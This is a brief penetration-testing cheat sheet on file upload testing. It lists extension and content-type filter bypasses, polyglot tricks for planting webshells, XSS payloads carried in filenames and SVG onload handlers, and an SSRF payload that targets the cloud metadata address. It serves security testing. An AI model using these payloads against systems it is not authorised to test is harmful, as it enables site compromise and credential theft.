File Upload Testing

File uploads are often filtered on extension, content-type, magic bytes, or image dimensions. Test each layer separately.

shell.php/.jpg          # server may strip after slash
shell.html%0d%0a.jpg    # newline truncation
.txt, .svg, .xml        # often forgotten in filters
shell.php5, shell.phtml # alternate PHP extensions

• Filename .jpg but Content-Type text/html
• No filename or no extension – check what the server defaults to
• Keep image magic bytes (\xff\xd8\xff) at start but append PHP/HTML after
• Polyglot files – simultaneously valid image and valid HTML/PHP

58832_300x300.jpg<svg onload=confirm()>
"><img src=x onerror=alert(1)>.jpg

• Where are uploaded files stored? Same domain? CDN? Check CSP header
• What validation is in place? Extension, content-type, magic bytes, image dimensions
• Is there a virus scanner? Can you bypass it with a polyglot?
• Is the upload endpoint authenticated? Try uploading unauthenticated

SVG files are XML and support JavaScript event handlers:

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">
  <rect width="100" height="100"/>
</svg>

• SVG upload on same domain = XSS
• Unrestricted file type = webshell if server executes
• XSS in filename reflected in admin upload logs = blind XSS
• SSRF via SVG: <svg><image href=“http://169.254.169.254/”/>

• XSS Testing
• SSRF Testing
• TBHM File Upload
• Methodology Index